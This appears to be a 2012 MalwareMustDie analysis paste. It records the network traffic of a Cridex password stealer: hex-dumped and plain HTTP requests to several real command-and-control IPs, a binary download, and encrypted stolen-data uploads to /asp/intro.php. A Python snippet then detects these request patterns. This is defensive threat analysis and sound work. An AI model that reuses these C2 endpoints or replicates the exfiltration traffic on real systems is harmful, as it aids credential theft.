MalwareMustDie

#MalwareMustDie - PD079-BHEK-20121209-3

Dec 9th, 2012
===========================
#MalwareMustDie - BHEK2 PD079
Cridex - Password stealer
NETWORK ACTIVITY EVIDENCE
@unixfreaxjp /malware]$ date
Sun Dec 9 21:21:01 JST 2012
===========================

An HTTP/1.1 POST request was sent to 180.235.150.72:8080 containing encrypted data:

// 192.168.7.84 ---> 180.235.150.72 HTTP/POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1

00000000 50 4f 53 54 20 2f 4e 35 6e 6d 4c 43 41 41 41 2f POST /N5 nmLCAAA/
00000010 4c 78 63 71 4b 41 41 2f 47 4c 6b 4f 56 43 41 41 LxcqKAA/ GLkOVCAA
00000020 41 41 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 41 63 AA/ HTTP /1.1..Ac
00000030 63 65 70 74 3a 20 2a 2f 2a 0d 0a 55 73 65 72 2d cept: */ *..User-
00000040 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 Agent: M ozilla/5
00000050 2e 30 20 28 57 69 6e 64 6f 77 73 3b 20 55 3b 20 .0 (Wind ows; U;
00000060 4d 53 49 45 20 37 2e 30 3b 20 57 69 6e 64 6f 77 MSIE 7.0 ; Window
00000070 73 20 4e 54 20 36 2e 30 3b 20 65 6e 2d 55 53 29 s NT 6.0 ; en-US)
00000080 0d 0a 48 6f 73 74 3a 20 31 38 30 2e 32 33 35 2e ..Host: 180.235.
00000090 31 35 30 2e 37 32 3a 38 30 38 30 0d 0a 43 6f 6e 150.72:8 080..Con
000000A0 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 34 37 tent-Len gth: 347
000000B0 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 ..Connec tion: Ke
000000C0 65 70 2d 41 6c 69 76 65 0d 0a 43 61 63 68 65 2d ep-Alive ..Cache-
000000D0 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 Control: no-cach
000000E0 65 0d 0a 0d 0a e....

The server answered by sending the binary from 180.235.150.72 to the test PC:

// 180.235.150.72 ===> 192.168.7.84 TCP [TCP segment of a reassembled PDU]

Server: nginx/1.0.10
Date: Sun, 09 Dec 2012 07:19:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding

00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d HTTP/1.1 200 OK.
00000010 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 .Server: nginx/1
00000020 2e 30 2e 31 30 0d 0a 44 61 74 65 3a 20 53 75 6e .0.10..D ate: Sun
00000030 2c 20 30 39 20 44 65 63 20 32 30 31 32 20 30 37 , 09 Dec 2012 07
00000040 3a 31 39 3a 30 32 20 47 4d 54 0d 0a 43 6f 6e 74 :19:02 G MT..Cont
00000050 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 ent-Type : text/h
00000060 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 tml; cha rset=UTF
00000070 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 -8..Tran sfer-Enc
00000080 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a oding: c hunked..
00000090 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 Connecti on: keep
000000A0 2d 61 6c 69 76 65 0d 0a 58 2d 50 6f 77 65 72 65 -alive.. X-Powere
000000B0 64 2d 42 79 3a 20 50 48 50 2f 35 2e 33 2e 31 38 d-By: PH P/5.3.18
000000C0 2d 31 7e 64 6f 74 64 65 62 2e 30 0d 0a 56 61 72 -1~dotde b.0..Var
000000D0 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 y: Accep t-Encodi
000000E0 6e 67 0d 0a 0d 0a 66 33 62 0d 0a bb aa ef 6f 93 ng....f3 b.....o.

It tried more than three times to complete a handshake with remote IP 132.248.49.112:
192.168.7.84 ===> 132.248.49.112 TCP netarx > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
132.248.49.112 => 192.168.7.84 TCP http-alt > netarx [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

It also tried to handshake with remote IP 113.130.65.77:
192.168.7.84 ===> 113.130.65.77 TCP optima-vnet > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
113.130.65.77 ==> 192.168.7.84 TCP http-alt > optima-vnet [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

Then it communicated over HTTP with 203.113.98.131:80:
192.168.7.84 ===> 203.113.98.131 HTTP POST /asp/intro.php HTTP/1.0
Request sent:
--------------
POST /asp/intro.php HTTP/1.0
Host: 203.113.98.131
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 251
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
CRYPTED0...DK.V..aa..c.....PI%.^D.|2.s;.p..T=....*.........

Response received:
-------------------
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 09 Dec 2012 07:21:47 GMT
Content-Type: text/html; charset=windows-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 16

STATUS-IMPORT-OK


Then it also connected to remote IP 173.224.221.135:8080 to send the POST data,
with the following recorded communication:

192.168.7.84 ===> 173.224.221.135 HTTP POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1

POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 173.224.221.135:8080
Content-Length: 408
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 09 Dec 2012 07:22:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165

POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 173.224.221.135:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 09 Dec 2012 07:22:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165


It sent the POST data to 206.176.226.157:8080 as follows:
192.168.7.84 ===> 206.176.226.157 HTTP POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 206.176.226.157:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 09 Dec 2012 07:23:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165
----
#MalwareMustDie!!!!
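As an added example (not part of the original paste), the two request shapes recorded above, the encrypted beacon to a :8080 C2 path and the `CRYPTED0` upload to `/asp/intro.php`, can be matched straight from raw HTTP request bytes; the header values are those captured on this page, the path regex and the 'clean' fallback are assumptions, and the sample bodies are cut down to a few constructed bytes.

```python
import re

# Header values copied from the captured traffic on this page.
BEACON_UA = "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)"
IMPORT_UA = "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"
# Three alphanumeric path segments, as in /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ (assumed shape).
BEACON_PATH = re.compile(r"^/[A-Za-z0-9]{5,12}/[A-Za-z0-9]{5,12}/[A-Za-z0-9]{5,12}/$")


def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, path, header dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def classify(raw: bytes) -> str:
    """Return 'cridex-beacon', 'cridex-import' or 'clean' for one request."""
    method, path, h, body = parse_request(raw)
    if method != "POST":
        return "clean"
    # Beacon to the :8080 C2: fixed UA, no-cache, 3-segment path, non-text body.
    if (h.get("host", "").endswith(":8080") and BEACON_PATH.match(path)
            and h.get("user-agent") == BEACON_UA
            and h.get("cache-control", "").lower() == "no-cache"
            and not body.isascii()):
        return "cridex-beacon"
    # Stolen-data upload: /asp/intro.php, octet-stream body starting with CRYPTED0.
    if (path == "/asp/intro.php" and body.startswith(b"CRYPTED0")
            and h.get("content-type") == "application/octet-stream"):
        return "cridex-import"
    return "clean"


# Constructed samples: headers as captured on the page, bodies cut to a few bytes.
BEACON = (b"POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1\r\nAccept: */*\r\n"
          b"User-Agent: " + BEACON_UA.encode() + b"\r\nHost: 173.224.221.135:8080\r\n"
          b"Content-Length: 8\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
          b"\x15\x7d\x92\x25\xcf\x68\x92\x5b")
IMPORT = (b"POST /asp/intro.php HTTP/1.0\r\nHost: 203.113.98.131\r\nAccept: */*\r\n"
          b"Content-Length: 12\r\nConnection: close\r\nContent-Type: application/octet-stream\r\n"
          b"Content-Encoding: binary\r\nUser-Agent: " + IMPORT_UA.encode() + b"\r\n\r\n"
          b"CRYPTED0\x00\x01\x02\x03")
CLEAN = b"POST /login HTTP/1.1\r\nHost: example.com\r\nContent-Length: 9\r\n\r\nuser=test"
```

Calling `classify(BEACON)` and `classify(IMPORT)` yields the two Cridex labels, while `classify(CLEAN)` falls through to 'clean'.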